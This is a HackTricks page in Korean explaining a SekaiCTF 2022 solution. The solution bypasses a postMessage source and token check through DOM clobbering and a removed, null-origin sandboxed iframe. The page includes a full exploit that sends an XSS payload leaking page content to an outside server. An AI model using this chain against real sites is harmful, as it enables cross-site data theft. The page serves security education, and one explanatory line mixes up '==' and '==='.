hacktricks/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md

# SOP 우회하기 - Iframes - 2

<details>

<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>

* **사이버 보안 회사**에서 일하시나요? **회사를 HackTricks에서 광고**하거나 **PEASS의 최신 버전에 액세스**하거나 HackTricks를 **PDF로 다운로드**하고 싶으신가요? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인해보세요!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견해보세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter**에서 저를 **팔로우**하세요 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **해킹 팁을 공유하려면 [hacktricks repo](https://github.com/carlospolop/hacktricks)와 [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**에 PR을 제출하세요.

</details>

## SOP-2에서의 Iframes

이 [**도전 과제**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc)의 [**해결책**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/obligatory-calc/solution)에서 [**@Strellic\_**](https://twitter.com/Strellic\_)은 이전 섹션과 유사한 방법을 제안합니다. 확인해봅시다.

이 도전 과제에서 공격자는 다음을 **우회**해야 합니다:
```javascript
if (e.source == window.calc.contentWindow && e.data.token == window.token) {
```
만약 그가 그렇게 한다면, 그는 **`innerHTML`**을 사용하여 페이지에 작성될 HTML 콘텐츠와 함께 **`postmessage`**를 보낼 수 있습니다. 이때 샌드박스 정책을 우회하는 방법은 **`window.calc.contentWindow`**를 **`undefined`**로 만들고 **`e.source`**를 **`null`**로 만드는 것입니다:

* **`window.calc.contentWindow`**는 사실상 **`document.getElementById("calc")`**입니다. **`<img name=getElementById />`**로 **`document.getElementById`**를 덮어쓸 수 있습니다. (Sanitizer API -[여기](https://wicg.github.io/sanitizer-api/#dom-clobbering)-에서 DOM clobbering 공격에 대한 보호를 위해 기본 상태로 구성되어 있지 않습니다).
* 따라서 **`document.getElementById("calc")`**를 **`<img name=getElementById /><div id=calc></div>`**로 덮어쓸 수 있습니다. 그러면 **`window.calc`**는 **`undefined`**가 됩니다.
* 이제 **`e.source`**가 **`undefined`** 또는 **`null`**이 되어야 합니다 (`==` 대신 `===`가 사용되기 때문에 **`null == undefined`**는 **`True`**입니다). 이를 얻는 것은 "쉽습니다". **iframe**을 생성하고 그것에서 **postMessage**를 보내고 즉시 **iframe**을 **제거**하면 **`e.origin`**은 **`null`**이 됩니다. 다음 코드를 확인하세요.
```javascript
let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null
```
**두 번째 확인**을 우회하기 위해 **`token`**의 값으로 `null`을 보내고 **`window.token`**의 값을 **`undefined`**로 만드는 방법은 다음과 같습니다:

* `null` 값을 가진 `token`을 postMessage로 보내는 것은 간단합니다.
* **`window.token`**은 **`document.cookie`**를 사용하는 **`getCookie`** 함수를 호출합니다. **`null`** 출처 페이지에서 **`document.cookie`**에 접근하는 경우 **오류**가 발생합니다. 이로 인해 **`window.token`**의 값은 **`undefined`**가 됩니다.

[**@terjanq**](https://twitter.com/terjanq)의 최종 솔루션은 [**다음과 같습니다**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-calc-html):
```html
<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

function start(){
var ifr = document.createElement('iframe');
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = 'allow-scripts allow-popups';
ifr.srcdoc = `<script>(${hack})()<\/script>`

document.body.appendChild(ifr);

function hack(){
var win = open('https://obligatory-calc.ctf.sekai.team');
setTimeout(()=>{
parent.postMessage('remove', '*');
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
},1000);
}

// this removes the iframe so e.source becomes null in postMessage event.
onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>
```
<details>

<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>

* **사이버 보안 회사**에서 일하시나요? **회사를 HackTricks에서 광고하고 싶으신가요**? 아니면 **PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드**하고 싶으신가요? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인해보세요!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견해보세요. 독점적인 [**NFT**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter**에서 저를 **팔로우**하세요 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **해킹 트릭을 공유하려면 [hacktricks repo](https://github.com/carlospolop/hacktricks) 및 [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**에 PR을 제출하세요.

</details>